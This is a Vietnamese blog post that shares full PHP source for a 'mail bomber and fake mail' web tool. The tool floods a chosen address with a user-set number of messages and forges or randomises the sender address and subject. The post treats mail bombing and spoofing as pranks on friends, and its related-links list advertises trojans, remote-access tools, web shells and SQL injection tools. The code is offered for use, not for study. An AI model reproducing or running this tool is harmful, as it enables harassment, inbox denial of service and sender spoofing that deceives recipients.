[Coding] code bom mail, fake mail

Posted by Babylove117x at Oct 24 23:55 | Coding | Nhận xét(0) | Đọc(755) Lớn | Vừa | Nhỏ

Highslide JS


Chú ý:
  • Yêu cầu host hỗ trợ php , BW lớn xíu k die host đấy :P
  • Tớ tách làm 2 để post khỏi kéo dài trang thui ! chứ thực ra là 1 đoạn của 1 file đó
  • code bom mail, fake mail này tuy đơn giản như cũng khá nguy hiểm, khuyên các bạn k nên lạm dụng nó quá ! bom mail vừa vừa cho vui, fake mail chọc bạn bè, phá phách là công an bắt đấy smoke

    <HTML>
    <HEAD>
    <TITLE>PHP Mailbomber</TITLE>
    </HEAD>
    <BODY bgcolor="#000000" text="#000080">
    <?
    if ($action == "BOMB")
    {
      if (ereg("[A-Za-z0-9_-]+([\.]{1}[A-Za-z0-9_-]+)*@[A-Za-z0-9-]+([\.]{1}[A-Za-z0-9-]+)+", $to))
        {
        echo "Sending $messages to $to<BR><BR><BR>";
        }
        else
        {
        die("Invalid emailaddress ($to)");
        }
    echo " $message , $check1 , $check2 , $from , $to , $messages ";
    for ($i = 1; $i <= $messages; $i++)
        {
        $randn = rand(100000,900000);
        if ($c1 == "ON") {
          if ($c2 == "ON") {
            mail($to, $randn, "$message", "From: $randn@$randn");
             }
            else
            {
            mail($to, $subject, "$message", "From: $randn@$randn");
            }
          }
          else
          {
          mail($to, $subject, "$message", "From: $from");
          }
        }
    }
    ?>
    <div align="center">
      <center>
      <table border="1" width="100%" bgcolor="#008000" bordercolor="#0000FF" cellspacing="0" cellpadding="0" height="100%">
        <tr>
          <td width="100%" bgcolor="#000080" bordercolor="#0000FF">
            <p align="center"><b><font color="#C0C0C0">PHP Bomber & Fake Mail</font></b></p>
    <CENTER>
    <form name="mailbomber" method="post" action="<?php echo $PHP_SELF ?>">
      <table border="1" cellspacing="0" cellpadding="2" bordercolor="#C0C0C0">
        <tr>
          <td colspan="3" bgcolor="#C0C0C0" height="20" width="573">
            <p align="center">PHP Bomber made by AnhTraiSG</p>
          </td>
        </tr>
        <tr>
          <td width="130" bgcolor="#CCCCCC" height="10">&nbsp; Bomb from</td>
          <td align="left" bgcolor="#CCCCCC" width="288" height="10">
            <input type="text" name="from" size="40" style="background-color: #008080; color: #00FF00">
          </td>
          <td width="139" align="left" bgcolor="#CCCCCC" height="10">
            <input type="checkbox" name="check2" value="ON" checked> random.
          </td>
        </tr>
        <tr>
          <td width="130" bgcolor="#C0C0C0" height="25">&nbsp; Subject</td>
          <td align="left" height="25" bgcolor="#C0C0C0" width="288">
          <input type="text" name="subject" size="40" style="background-color: #008080; color: #FFFF00">
          </td>
          <td width="139" align="left" height="25" bgcolor="#C0C0C0">
          <input type="checkbox" name="check1" value="ON"> random.
          </td>
        </tr>
        <tr>
          <td width="130" bgcolor="#CCCCCC" height="25">&nbsp; Bomb to</td>
          <td align="left" height="25" bgcolor="#CCCCCC" width="288">
            <input type="text" name="to" size="40" style="background-color: #008080; color: #00FFFF">
          </td>
          <td width="139" align="left" height="25" bgcolor="#CCCCCC">
            &nbsp;
            <input type="text" name="messages" value="1" size="3" style="background-color: #008080; color: #00FF00">
            mails.
          </td>
        </tr>
            <tr>
          <td colspan="3" width="573" bgcolor="#C0C0C0" height="21">&nbsp;&nbsp;<font color="#FF0000">
            <marquee scrollamount="1" scrolldelay="60"> http://www.vnghiit.com - http://www.vuongnghi.tk </marquee>
            </font></td>
        </tr>
        <tr>
          <td width="130" bgcolor="#CCCCCC" height="40%">&nbsp; Text</td>
          <td colspan="2" width="435" bgcolor="#CCCCCC" height="40%">
            <textarea name="message" cols="50" rows="9" style="background-color: #008080; color: #00FF00"></textarea>
          </td>
        </tr>
        <tr>
          <td width="130" bgcolor="#C0C0C0" height="27">&nbsp;</td>
          <td colspan="2" width="435" bgcolor="#C0C0C0" height="27">
            <input type="submit" name="action" value="BOMB">
          </td>
        </tr>
      </table>
    </form>
    </CENTER>
            <p align="center"><b><font color="#C0C0C0">Chuc cac ban vui ve !</font><br><font color="#CCCCCC"> http://vnghiit.com - http://vuongnghi.tk </font><font color="#C0C0C0">
              2003</font></b></td>
        </tr>
      </table>
      </center>
    </div>
    </BODY>
    </HTML>
    Các Bài Viết Liên Quan
    [Hacking] Trojan Backdoor TeraBIT Virus Maker 3.1
    [Hacking] Trojan Backdoor Beast 2.07 - Remote Administration Tool
    [Hacking] Spam mail với Kristanix Email Sender Deluxe 2.19
    [Hacking] Ebook Advanced SQL Injection Joe McCray link mediafire.com
    [Hacking] Tool Havij 1.08 MySQL Blind Injection hay dễ dùng hiệu quả
    [Ebook] Sổ tay SEO 1.0 link mediafire.com
    [Hacking] Công cụ shell để các bạn hack local và upload file
    Hướng dẫn điều khiển máy tính victim bằng Teamviewer RAT
    [Hacking] Video Exploit NukeViet v2.0 RC2
    [Hacking] Truy tìm dấu vết kẻ tấn công từ chối dịch vụ DOS
    [Ebook] Lập trình Python
    [Đề Tài] PTTKHT Phân tích thiết kế hệ thống Quản lý thư viện sách
    [Đề Tài] PTTKHT Quản lý dịch vụ khách hàng và Phân phối nước khoáng Lavie
    [Hacking] Code shell php,asp,aspx ... để hack local
    [Hacking] VB6 Vnc Auto Sqlinject bug search Ver 1.0 link mediafire.com
  • Tags: , , ,
    Viết nhận xét
    Hình vui
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    emotemotemotemotemot
    Mở HTML
    Mở UBB
    Mở hình vui
    Ẩn giấu
    Hãy nhớ
    Tên gọi   Mật khẩu   Khách không cần mật khẩu
    Địa chỉ web   Email   [Đăng ký]